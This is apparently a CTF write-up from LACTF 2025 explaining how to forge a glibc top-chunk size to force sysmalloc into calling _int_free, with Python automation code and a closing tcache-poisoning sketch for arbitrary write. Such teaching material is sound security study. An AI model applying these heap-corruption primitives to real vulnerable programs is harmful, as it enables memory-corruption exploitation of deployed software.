Automating triggering _int_free for faster pwnage


I played in LACTF 2025 and wanted to quickly share how I automated triggering sysmalloc->_int_free for faster pwnage, calling free at will instead of setting it up manually each time. The challenge I built this functionality for was lamp, by enzocut.

Oftentimes we need to get really creative with exploitation. When heap grooming in glibc, we won't always have a user-controlled free primitive we can use off the bat, but given an OOB/BOF on the heap it's still possible to trigger the sysmalloc->_int_free primitive. Doing it manually is a pain, though, so let's automate it.

What is _int_free? _int_free is the function that does the magic behind freeing a chunk, but why is it called within sysmalloc? Well, if we try to allocate a size larger than the top chunk can dish out to us, malloc falls back to sysmalloc to grow the heap, and sysmalloc will call _int_free on the old top chunk when it fails to get merged with the new memory during that growth.

We can trigger this by overwriting the top chunk's size with a value smaller than a size we can allocate, but before moving on let's talk about the checks we need to bypass:

/* Record incoming configuration of top */
old_top = av->top;
old_size = chunksize (old_top);
old_end = (char *) (chunk_at_offset (old_top, old_size));

...

assert ((old_top == initial_top (av) && old_size == 0) ||
        ((unsigned long) (old_size) >= MINSIZE &&
        prev_inuse (old_top) &&
        ((unsigned long) old_end & (pagesize - 1)) == 0));
...

The three checks that we must pass are as follows:

  1. The incoming (old) top size must be at least MINSIZE (0x20 on 64-bit)
  2. The prev_inuse bit must be set in the overwritten size field
  3. The address at (top pointer + new size) must be page aligned

If we pass these checks, then the next time we allocate a size larger than the top size, boom: a new freed chunk lands on the heap, and this gives us a free primitive.
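
To make those constraints concrete, here is a minimal sketch (not from the challenge) of computing a fake top size that passes all three checks; the top address and page size are hypothetical placeholders.

def fake_top_size(top_addr: int, page_size: int = 0x1000) -> int:
    # The end of the fake top chunk must land exactly on a page boundary
    next_boundary = (top_addr + page_size) & ~(page_size - 1)
    size = next_boundary - top_addr

    assert size >= 0x20   # check 1: at least MINSIZE (0x20 on 64-bit)
    return size | 1       # check 2: keep the prev_inuse bit set

top = 0x55555555a0a0                  # hypothetical top chunk address (e.g. from a heap leak)
print(hex(fake_top_size(top)))        # 0xf61 -> top + 0xf60 is page aligned (check 3)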


My _int_free automation function for the challenge

def trigger_int_free(new_top_size: int, heap_top: int) -> int:
    next_top_ptr = get_next_page_aligned_address(heap_top)
    offset_till_stop = (next_top_ptr - heap_top) - new_top_size
    current_top_addr = heap_top
    size_to_alloc = 0

    # Request size -> resulting chunk size on the heap (request + 0x10 of header/alignment)
    chunk_sizes = {
        0x10: 0x20, 
        0x20: 0x30, 
        0x30: 0x40, 
        0x40: 0x50, 
        0x50: 0x60, 
        0x60: 0x70, 
        0x70: 0x80,
        0x80: 0x90, 
        0x90: 0xa0, 
        0xa0: 0xb0,
        0xb0: 0xc0,
        0xc0: 0xd0,
        0xd0: 0xe0,
        0xe0: 0xf0,
        0xf0: 0x100
    }

    # Ensure the prev_inuse bit is set in the fake top size
    new_top_size |= 1

    # Heap spray to move the top pointer to where top + new_top_size + min_size_alloc
    # == the next page aligned address
    while offset_till_stop > new_top_size:
        # Both branches break right away, so each pass either takes a 0x100-sized
        # chunk off the remaining distance or pads with a 0x20-sized chunk
        for request_size, chunk_mass in reversed(list(chunk_sizes.items())):
            if offset_till_stop >= chunk_mass:
                size_to_alloc = request_size
                offset_till_stop -= chunk_mass
                current_top_addr += chunk_mass
                alloc(size_to_alloc)
                break

            else:
                alloc(0x10)
                current_top_addr += 0x20
                offset_till_stop -= 0x20
                break

        if size_to_alloc == 0:
            break

        if offset_till_stop - size_to_alloc < new_top_size:
            continue

        print(f"Allocating {hex(size_to_alloc)}. Remaining offset_till_stop: {hex(offset_till_stop)}")

    page_aligned = get_next_page_aligned_address(current_top_addr)
    offset_now = page_aligned - current_top_addr

    print(f"Finding a suitable size for the final allocation and overwrite... {current_top_addr:#x} {page_aligned:#x}")

    for alloc_size, heap_mass in chunk_sizes.items():
        # The trailing -1 cancels out the prev_inuse bit we set on new_top_size
        operation = (heap_mass + new_top_size) - offset_now - 1
        print(f"{heap_mass:#x} + {new_top_size:#x} - {offset_now:#x} - 1 = {operation:#x}")

        if operation == 0:
            alloc_and_write(alloc_size, b"A"*alloc_size + p64(0) + p64(new_top_size))  # Overwrite top chunk size field
            alloc(new_top_size+0x8)  # Request more than the fake top can serve -> sysmalloc -> _int_free
            return current_top_addr + 0x200f0 + alloc_size  # 0x200f0 is a challenge-specific offset
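
For reference, a hedged usage sketch: the heap leak value below is a placeholder, `alloc` and `alloc_and_write` are whatever wrappers your exploit has around the target's allocation menu, and `get_next_page_aligned_address` is a small address-rounding helper.

heap_top = 0x55555555a2c0   # hypothetical: current top chunk address from a heap leak

# Shrink the top to 0x101 (prev_inuse already set); the function sprays until the
# layout passes the sysmalloc checks, then the oversized request frees the old top
addr_hint = trigger_int_free(new_top_size=0x101, heap_top=heap_top)  # returned address is challenge-specific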

So, okay, we see the script, but how did we get to this point? In order to automate sysmalloc->_int_free we need:

  1. Either a predictable top chunk offset from the next page aligned chunk or a heap leak for calculating the top pointer.
  2. A size to overwrite the top with.

Given those variables, we can do a rough calculation: we need to heap spray until top + new_top_size + min_size_alloc == the next page aligned address.
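
As a quick sanity check of that formula, here is the arithmetic for a hypothetical layout (the addresses are placeholders): the last allocation's chunk size plus the fake top size has to land exactly on the next page boundary.

top           = 0x55555555af00           # hypothetical top pointer after spraying
new_top_size  = 0x41                     # fake top size we will write (prev_inuse set)
page_boundary = (top + 0x1000) & ~0xfff  # 0x55555555b000

# Chunk size of the final allocation that lines the fake top up with the boundary
last_chunk = page_boundary - top - (new_top_size & ~1)
print(hex(last_chunk))                   # 0xc0 -> request 0xb0 per the chunk_sizes table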

Given these details, we can essentially build this functionality for any scenario where we might want to automate triggering sysmalloc->_int_free to get freed chunks on the heap.

Now that we've crafted a free primitive, we can trigger a bunch of frees, do a first fit, write bytes linearly into the next freed chunk to overwrite its FD, and gain an arbitrary write primitive.
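
To sketch that last step in a generic way (a tcache-poisoning style FD overwrite under assumed conditions, not the exact lamp exploit): the addresses and the 0x50-sized chunks below are hypothetical, it assumes at least two chunks of that size already sit in the bin, and on glibc 2.32+ the stored forward pointer is mangled by safe-linking, so we account for that.

def mangle(fd_pos: int, target: int) -> int:
    # Safe-linking (glibc >= 2.32): the stored fd is (&fd >> 12) ^ target
    return (fd_pos >> 12) ^ target

victim_chunk = 0x55555555b050   # hypothetical: freed 0x50-sized chunk right after ours
target       = 0x55555555c010   # hypothetical: 16-byte aligned address we want malloc to return

# Linear overflow out of our 0x50-sized chunk: pad, fake prev_size, keep the
# victim's size field intact, then poison its fd with the mangled target
alloc_and_write(0x40, b"B" * 0x40 + p64(0) + p64(0x51) + p64(mangle(victim_chunk + 0x10, target)))

alloc(0x40)   # pops the poisoned victim chunk from the bin
alloc(0x40)   # next allocation comes back at `target` -> arbitrary write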